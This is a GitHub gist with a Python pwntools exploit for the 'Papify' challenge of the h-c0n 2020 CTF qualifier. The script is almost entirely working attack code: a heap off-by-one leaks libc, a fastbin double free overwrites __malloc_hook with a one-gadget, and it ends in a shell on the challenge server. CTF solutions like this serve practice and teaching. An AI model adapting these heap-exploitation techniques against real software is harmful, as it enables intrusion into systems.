Created
January 20, 2020 01:04
-
-
Save KaoRz/c885f53da9e8fa89a2f43fa6967d0ef3 to your computer and use it in GitHub Desktop.
Papify exploit - h-c0n 2020 CTF qualifier
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # coding: utf-8 | |
| from pwn import * | |
| context.terminal = ['tmux', 'sp', '-h'] | |
| #context.log_level = 'DEBUG' | |
| HOST = "ctf.h-c0n.com" | |
| PORT = 60003 | |
| elf = ELF("./chall") | |
| libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False) | |
| LOCAL = False | |
| def add_paper(idx, size, data, shell = False): | |
| io.recvuntil(">> ") | |
| io.sendline("1") | |
| io.recvuntil("index: ") | |
| io.sendline(str(idx)) | |
| io.recvuntil("size: ") | |
| io.sendline(str(size)) | |
| if shell == False: | |
| io.recvuntil("content: ") | |
| io.sendline(data) | |
| def edit_paper(idx, pos, data): | |
| io.recvuntil(">> ") | |
| io.sendline("2") | |
| io.recvuntil("index: ") | |
| io.sendline(str(idx)) | |
| io.recvuntil("fix?: ") | |
| io.sendline(str(pos)) | |
| io.recvuntil("content: ") | |
| io.sendline(data) | |
| def delete_paper(idx): | |
| io.recvuntil(">> ") | |
| io.sendline("3") | |
| io.recvuntil("index: ") | |
| io.sendline(str(idx)) | |
| def print_paper(idx): | |
| io.recvuntil(">> ") | |
| io.sendline("4") | |
| io.recvuntil("index: ") | |
| io.sendline(str(idx)) | |
| if LOCAL == True: | |
| io = process(elf.path) | |
| else: | |
| io = remote(HOST, PORT) | |
| for _ in range(7): | |
| add_paper(0, 0x100, "") | |
| delete_paper(0) | |
| add_paper(0, 0x108, "") | |
| add_paper(1, 0x100, "") | |
| add_paper(2, 0x10, "") # Barrier | |
| delete_paper(1) # Send chunk to unsorted bin | |
| edit_paper(0, 0x108, b"\x13") # Trigger off-by-one (overwrite IS_MMAPPED bit) | |
| add_paper(1, 0x100, "A" * 7) | |
| print_paper(1) | |
| io.recvuntil("A" * 7 + "\n", drop = True) | |
| libc_leak = u64(io.recvuntil("\nDone.", drop = True).ljust(8, b"\x00")) | |
| libc.address = libc_leak - 0x1e4ca0 | |
| log.success("Leaked GLIBC arena address: " + hex(libc_leak)) | |
| log.info("GLIBC base address: " + hex(libc.address)) | |
| log.info("__malloc_hook@@GLIBC address: " + hex(libc.sym['__malloc_hook'])) | |
| log.info("One gadget GLIBC address: " + hex(libc.address + 0x106ef8)) | |
| for _ in range(7): | |
| add_paper(0, 0x68, "") | |
| delete_paper(0) | |
| add_paper(0, 0x68, "") | |
| add_paper(1, 0x68, "") | |
| delete_paper(0) | |
| delete_paper(1) | |
| delete_paper(0) | |
| add_paper(0, 0x68, p64(libc.sym['__malloc_hook'] - 0x23)) | |
| add_paper(0, 0x68, "") | |
| add_paper(0, 0x68, "") | |
| add_paper(0, 0x68, b'\x00' * 0x13 + p64(libc.address + 0x106ef8)) | |
| add_paper(1, 1, "", shell = True) | |
| io.interactive() | |
| io.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment